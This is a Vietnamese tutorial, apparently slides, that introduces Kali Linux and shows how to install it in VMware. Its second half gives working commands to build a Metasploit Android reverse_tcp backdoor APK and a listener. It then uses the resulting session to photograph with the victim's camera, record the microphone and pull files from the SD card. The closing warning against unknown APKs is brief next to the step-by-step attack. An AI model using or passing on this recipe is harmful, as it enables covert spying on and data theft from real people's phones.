lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt
  • 2. cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ. Tính tương thích kiến trúc Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. Khả năng tùy biến cao Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).
  • 3. Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa II. Cài đặt Kali Linux trên máy ảo VMware Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit. http://www.kali.org/downloads/ Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo. Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên cửa sổ mới mở, chọn custom và nhấn next
  • 4. Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó: Đặt tên và đặt đường dẫn cho máy ảo
  • 5. Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định. Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường...
  • 6. Tiếp theo chọn Root password, luôn nhớ Root password đã chọn! Phần Partition chọn Guided – use entire disk và All files in one partition
  • 7. Chọn Finish partitioning and write changes to disk Chọn Yes
  • 8. Nhấn continue để bắt đầu cài đặt khoảng 15 phút.
  • 9. Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.
  • 10. Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root và password đã đặt ở phần trước. Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware
  • 11. III. Tạo mã độc trên Kali Linux để xâm nhập Android Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau: Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network
  • 12. Bấm vào Edit -> Virtual Network Editor... Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
  • 13. Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android Đầu tiên mở terminal và gõ dòng lệnh Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk 192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali
  • 14. 8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng (well knowm port : 0 -> 1023). Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor. Tiếp theo, gõ lệnh msfconsole
  • 15. Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: use exploit/multi/handler set payload /meterpreter/reverse_tcp set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên. set port 8080 – nhập port giống với port khi tạo payload ở trên. Exploit Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
  • 16. Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút reverse_tcp:
  • 17. Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau: Để xem thông tin về máy, nhập lệnh SysInfo Sử dụng camera: Để xem danh sách camera, nhập webcam_list
  • 18. Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau: File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy
  • 19. Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
  • 20. Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
  • 21. Dùng lệnh cd /sdcard/Download để vào thư mục Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download App.apk Và file này sẽ được tải về thư mục root của máy Kali
  • 22. Ngoài ra, để xem danh sách các lệnh, gõ help. IV. Tổng kết Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách sử dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy android về máy. Sau khi thử nghiệm cách tấn công này, ta rút ra không nên tải về và chạy file lạ trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên, chỉ cần máy bị nhiễm backdoor là ta đã có thể xem như có toàn quyền kiểm soát máy android đó.